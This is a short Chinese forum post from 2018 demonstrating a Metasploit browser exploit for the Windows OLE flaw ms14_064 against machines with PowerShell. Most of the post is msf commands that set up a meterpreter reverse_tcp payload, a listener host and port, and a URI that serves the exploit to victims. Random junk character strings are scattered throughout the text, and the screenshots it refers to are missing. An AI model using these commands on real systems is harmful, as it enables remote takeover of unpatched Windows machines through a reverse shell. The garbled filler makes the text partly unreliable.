+ ^, E' w1 x; n8 X! n8 V( x7 Q
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
U) c" T1 L6 N
' N* ~$ n5 X- I* V6 {' F% f& C
* I9 f/ g, J) J( y0 b 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
1 T0 ?2 v2 d5 ^3 r, b
1 e* x+ u! l1 n' y+ w1 I2 F3 h d! n& i
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
; Q9 e: I7 n* ?
2 j4 q' d$ |6 @/ m: i
1 ~4 u; O4 h, I
set AllowPowershellPrompt true; c4 X* a& i9 Z7 R6 s. w
* i8 [% t$ |* q; z- L0 p9 z% m
3 F- G4 U0 w8 o8 p2 _* B
Set LHOST 192.168.0.109
9 @ s1 r! Y/ z# a
$ k, I0 O; k5 ]# o
- b) s( ]* d. Z3 v$ w set SRVHOST 192.168.0.109$ g& o0 s2 ]' G1 I& M
- @$ b! r- V. e2 i a
7 G9 q+ Q* E; r% r/ { Set uripath share
; E5 V. z4 y5 b5 T* K( H+ i# C; B
3 q$ C& ^7 i7 D0 T9 X/ ^0 ~& u
' b7 t) S3 O/ O& D% T! [# i( b3 }1 L
Set srvport 80
( E2 i0 o, P) G, p3 \ _
+ D! P0 z3 C: } ~
, i6 k# N. `* a0 R! j1 E, H 
- f @/ ~& Y; Z( ]0 x
& ]7 k' g2 G% ~6 `* ?9 p) q# T7 y. V1 w! f
, _: Y. T/ L- ~2 w! |# j0 a
" x5 ` `* a" a) q& |
; V$ a- X$ t7 E7 b3 v5 B1 b * Z0 U3 f1 T2 G( T/ F3 o" R
+ V5 m! E3 L/ y* P
, j8 C5 M7 E# M( P) m8 L8 r. g * F: |- k8 ?. J) ^# s( {9 Z$ P
: d4 p# ?: L3 T5 O2 [1 G
/ M7 B# ~# X# J5 \5 M
# _% k, d- `; E7 d2 K
$ p5 }' C9 J* g& y3 v
* R+ E6 w* H4 `$ [ 下面我们来访问本地地址如图:4 n% j" Z" T, L9 j/ w6 G
: h7 V2 _3 I- m! W% t: `8 `* j
) o& V5 o& d* ] 4 [3 g* `& @$ x. [: u
- h6 b+ c0 L( \4 g5 ^
3 j y! Q: c4 |. ^& ?; F% i
' q' R( D" ? m( A# Y
1 F2 E+ m' P% p0 x* t( W! g) [' {* M9 O, f, h) G' T1 X
$ k* X3 ~' M5 ^$ R
发表于 2018-10-20 20:20:35
收藏
支持
反对